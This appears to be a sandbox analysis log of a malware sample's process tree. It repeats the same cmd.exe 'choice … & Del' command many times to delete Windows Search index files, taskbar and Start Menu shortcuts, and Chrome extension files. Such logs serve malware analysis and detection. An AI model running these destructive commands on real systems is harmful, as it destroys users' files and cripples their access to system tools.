C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{0e75dae2-a549-4aac-a9fd-9edba88f5856}\0.1.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{0e75dae2-a549-4aac-a9fd-9edba88f5856}\0.2.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afc5b565-91c7-42c2-95b1-ad05965009fe}\0.0.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afc5b565-91c7-42c2-95b1-ad05965009fe}\0.1.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afc5b565-91c7-42c2-95b1-ad05965009fe}\0.2.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c260930d-5654-4a01-a146-931128d29e97}\0.0.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c260930d-5654-4a01-a146-931128d29e97}\0.1.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c260930d-5654-4a01-a146-931128d29e97}\0.2.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f93185bd-933e-47d6-a565-5d894ff45e99}\appsconversions.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f93185bd-933e-47d6-a565-5d894ff45e99}\appsglobals.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f93185bd-933e-47d6-a565-5d894ff45e99}\appssynonyms.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f93185bd-933e-47d6-a565-5d894ff45e99}\settingsconversions.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f93185bd-933e-47d6-a565-5d894ff45e99}\settingsglobals.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f93185bd-933e-47d6-a565-5d894ff45e99}\settingssynonyms.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{697194af-5648-404b-81b3-0b51f6b41c7f}\0.0.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{697194af-5648-404b-81b3-0b51f6b41c7f}\0.1.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{697194af-5648-404b-81b3-0b51f6b41c7f}\0.2.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b328c623-51a1-4a9e-a9c4-5e7bee8571d6}\0.0.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b328c623-51a1-4a9e-a9c4-5e7bee8571d6}\0.1.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b328c623-51a1-4a9e-a9c4-5e7bee8571d6}\0.2.filtertrie.intermediate.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Administrative Tools.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\128.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.76.1_0\offscreendocument.html"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\15W9OV67\www.bing[1].xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\craw_window.html"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\128.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\192.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\256.png"3⤵
-
